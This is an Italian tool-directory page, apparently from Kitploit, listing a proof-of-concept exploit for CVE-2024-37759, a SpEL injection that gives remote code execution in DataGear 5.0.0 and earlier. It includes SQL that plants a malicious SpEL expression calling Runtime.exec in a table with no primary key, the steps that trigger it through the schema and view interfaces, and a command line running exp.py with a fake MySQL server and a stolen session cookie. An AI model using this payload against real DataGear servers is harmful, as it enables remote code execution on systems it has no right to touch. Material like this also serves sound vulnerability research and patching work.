Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-37759_PoC — Exploit proof-of-concept per CVE-2024-37759, una vulnerabilità di injection SpEL in DataGear 5.0.0 e versioni precedenti che consente l'esecuzione remota di codice tramite tabelle di database appositamente predisposte. | Kitploit
Strumenti/GitHubGitHub/crumbledwall/cve-2024-37759_poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingSviluppo Payload
GitHubcrumbledwall/cve-2024-37759_poc

CVE-2024-37759_PoC

Exploit proof-of-concept per CVE-2024-37759, una vulnerabilità di injection SpEL in DataGear 5.0.0 e versioni precedenti che consente l'esecuzione remota di codice tramite tabelle di database appositamente predisposte.

Vedi Repository
542 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-37759 PoC

Descrizione

DataGear versione 5.0.0 e precedenti presenta una vulnerabilità di iniezione di espressioni SpEL che porta all'esecuzione di codice remoto.

Exploit

Dettagli dell'Exploit CVE

Quando si richiede l'interfaccia /data/{schemaId}/{tableName}/view, se la tabella del database non ha una chiave primaria, un attaccante può iniettare un'espressione SpEL dannosa nel campo data. Quando viene cliccato il pulsante "view", l'espressione SpEL verrà eseguita.

Per eseguire l'attacco, puoi creare una tabella del database dannosa in questo modo:

root@kitploit:~
CREATE DATABASE evil;

CREATE TABLE `evil` (
  `name` varchar(209) COLLATE utf8mb4_unicode_ci DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

INSERT INTO `evil` VALUES ("#{T(java.lang.String).forName('java.lang.Runtime').getRuntime().exec('calc')}");

Quindi, accedi e aggiungi questo database MySQL nell'interfaccia di aggiunta schema: /schema/saveAdd. Clicca successivamente sul pulsante "view" e l'espressione SpEL verrà eseguita.

Utilizzo dell'Exploit

Questo exploit è modificato da MySQL_Fake_Server. Per prima cosa, accedi al portale e ottieni il cookie "JSESSIONID". Puoi quindi usare questo exploit per eseguire comandi automaticamente.

L'argomento -t specifica il sito vulnerabile di destinazione, -o specifica l'indirizzo IP pubblico dove il finto server MySQL è accessibile, -p è per la porta del finto server, -s è per il valore del cookie "JSESSIONID", e -c specifica il comando che vuoi eseguire.

root@kitploit:~
python3.7 exp.py -t "http://localhost:50401" -o "192.168.25.130" -p "3306" -s "B751A41FBE8C3385B386B2365C2FB86D" -c "calc"
Scarica lo strumento